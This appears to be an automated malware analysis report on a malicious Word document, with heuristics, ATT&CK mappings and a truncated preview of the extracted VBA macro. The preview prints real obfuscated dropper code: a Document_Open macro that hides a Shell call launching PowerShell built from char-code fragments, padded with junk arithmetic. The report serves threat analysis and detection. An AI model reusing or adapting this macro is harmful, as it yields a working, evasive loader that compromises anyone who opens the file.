MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The 'Document_Open' macro triggers the 'Shell()' function, which is a critical finding indicating the execution of arbitrary commands. This macro likely downloads and executes a second-stage payload, as suggested by the 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristics. The ClamAV detection name 'Doc.Malware.Valyria-7012661-0' further supports its malicious nature.
Heuristics 6
-
ClamAV: Doc.Malware.Valyria-7012661-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-7012661-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15213 bytes |
SHA-256: 9019bd1f0f7945b859b6086dac510f7e60a503f69feefe7f20fbb91f1a56d500 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "kwHfCEUccaz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function rhYNBK()
On Error Resume Next
ljoFI = AVuXsZ
hXQnXb = CDbl(iUWJG * CDbl(BPPfr + Int(pNjTN * Rnd(12432)) * EzDcF * Log(81793 * irsBqh - ojRNfw + Fix(51))))
AECjNX = CDbl(fsQSId)
WNoJO = iPGiH
YPSiFY = Tan(27506)
jkFPjj = Tan(69553)
ArozJ = ZNDZw
pSXOs = CDbl(WRjDlz * CDbl(ZzzMh + Int(qIucSi * Rnd(27517)) * ponapJ * Log(41436 * vAAFm - sizFq + Fix(51))))
upEfi = CDbl(hdwdvo)
HDwLcs = QQfMsk
XOzNZ = Tan(19218)
kUaBWu = Tan(11677)
GvUbr = OiUJB
dRbpuB = CDbl(niKrn * CDbl(BMPKYA + Int(hkwCrB * Rnd(2441)) * BiKCq * Log(10159 * CmvJt - iswEhh + Fix(51))))
UYwtAz = CDbl(wzowok)
cPOGA = sAwJT
UOlEvD = Tan(34080)
IzXvJP = Tan(94655)
YiNzQ = ltwzPl
FwXIjD = CDbl(uzUZp * CDbl(ppjlj + Int(VjLbPR * Rnd(96444)) * OKwDj * Log(45685 * FLiCiq - NYNnI + Fix(51))))
uWHqi = CDbl(BjDQqR)
jiEiAF = SmNbJ
JCLPt = Tan(51870)
DwJKNT = Tan(31777)
rhYNBK = QCiFOwRb + VBA.Shell(FwEhjzFZdKT + Chr(wjhjjrfIK + vbKeyP + issVRHHzn) + "owers" + qXtOWCw + Hzbqr + jLuoAHMdDE + YocYAQYHu + UQAAXqjsjC, 44867 - 44867)
PKoXM = AKiVz
qtTRFc = CDbl(NGtII * CDbl(jbfijS + Int(ZKiZqh * Rnd(42388)) * EzoRQ * Log(58056 * NpAvI - CAWCfq + Fix(51))))
KubXGL = CDbl(HEqrC)
OqhnJ = XJMWKq
JSAlq = Tan(31572)
YUbuDW = Tan(45198)
CuZXCR = tRLnoS
iuGtZ = CDbl(WwYRj * CDbl(kYjKc + Int(vaMvIP * Rnd(13839)) * dQuKWC * Log(46592 * FdnUV - PDWIq + Fix(51))))
wjmqmu = CDbl(GENui)
TTFXIb = LIYzZV
bkXuNu = Tan(12864)
hVKHiq = Tan(86584)
End Function
Private Sub Document_open()
On Error Resume Next
Vrwha = JzJNMu
CEjZO = CDbl(jpLmR * CDbl(zPAQl + Int(VKAzN * Rnd(51887)) * BGBJPm * Log(24853 * jFBDBR - AdKFi + Fix(51))))
jMEqIw = CDbl(zijwz)
qNKzN = zQKXnI
HFnbfJ = Tan(63439)
dSIiX = Tan(96747)
sWAKu = DHWwO
ZZPII = CDbl(oAaYp * CDbl(iMnpK + Int(GELiwr * Rnd(19772)) * SjuIna * Log(48034 * WlIfk - DnwTh + Fix(51))))
urbYw = CDbl(CHGRl)
sfpCj = AABXmi
LYntar = Tan(77484)
chPOzl = Tan(82153)
rhYNBK
kPIfJ = hQCvhi
SqwsNh = CDbl(kpIXE * CDbl(OWGRra + Int(iidXK * Rnd(86109)) * zjwFpH * Log(93513 * lQsCzr - uHlaM + Fix(51))))
oMZhUk = CDbl(BrChz)
XlpYo = PQjVlj
bNlQf = Tan(20206)
KKlEH = Tan(44225)
CYrKiM = QCFDd
zZVMP = CDbl(HiErnw * CDbl(IhciAz + Int(DVMwN * Rnd(12039)) * tAhQi * Log(12016 * iNDzl - dOzhD + Fix(51))))
RJbNW = CDbl(JNOiXa)
sUiTY = PuipXf
cnYMBi = Tan(70964)
tDpoX = Tan(8311)
End Sub
Attribute VB_Name = "BMMELJMdoKDAjA"
Function qXtOWCw()
On Error Resume Next
uNFmYJ = CDbl(wQXrM)
VMdjKL = Tan(656)
YcdmQ = CDbl(oXSjs * CDbl(IEFEZw + Int(zNLXqO * Rnd(13555)) * rHupj * Log(23903 * HsjqS - WcwKEK + Fix(51))))
RSNVB = Tan(85617)
vwMUif = clPNl
rzzZV = Ruzjs
sBkGCrsZHX = "HeLL " + " [strInG]::JoIN" + "('',([cHar[]]" + " (41,107, 89,11" + "1 ,76 , 88," + " 70, 45 " + ", 48,45 ,9" + "9,1" + "04 ,122 ,32,9"
ZtSjT = CDbl(zQNkH)
qzYuZ = Tan(76227)
iVUFsm = CDbl(pQJzs * CDbl(UTLYV + Int(EYIbCZ * Rnd(46630)) * WYCYq * Log(89340 * VVcSCm - wDKwu + Fix(51))))
zqTBqa = Tan(27562)
IzwiFT = maFRF
TTunwS = iZMYS
maDtMKm = "8 ,111,103, " + "10" + "4 , 11" + "0,121 " + ",45 , 127," + "108, 99 ,105," + " 98,9" + "6, 54" + ", 41,79,119,"
ziEvU = CDbl(dmSHA)
dSjEAi = Tan(31094)
mwrlwX = CDbl(bsUcM * CDbl(qDSLM + Int(rRiDW * Rnd(45619)) * kwTsQ * Log(82792 * iqToT - KBEhb + Fix(51))))
zlrMzW = Tan(55076)
lvTAk = rIrpNB
ZvbKmi = Sipap
lbtCM = "123 ,110, 66" + ", 45 , 48" + " ,4" + "5, " + "99," + " 10"
BFtYC = CDbl(PKsnMC)
YZhtjU = Tan(41638)
MBRrb = CDbl(iUjIR * CDbl(Swnvt + Int(niQSdP * Rnd(27120)) * KmjTF * Log(33464 * FMXQB - zqSnK + Fix(51))))
jFXRfi = Tan(2959)
iMjQfs = onzfS
TSDmYT = bXjwj
ddaEwYs = "4 ,122" + ", 32 ,98" + ", 111," + "103," + "104 ," + "110 , 1" + "21,45 " + ",94 , 116,126" + ",121 ,10" + "4, 96"
EJvkfX = CDbl(iSuUYp)
iGnUBp = Tan(7946)
mAsnB = CDbl(mbUNH * CDbl(GYwIX + Int(mWwrP * Rnd(2502
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.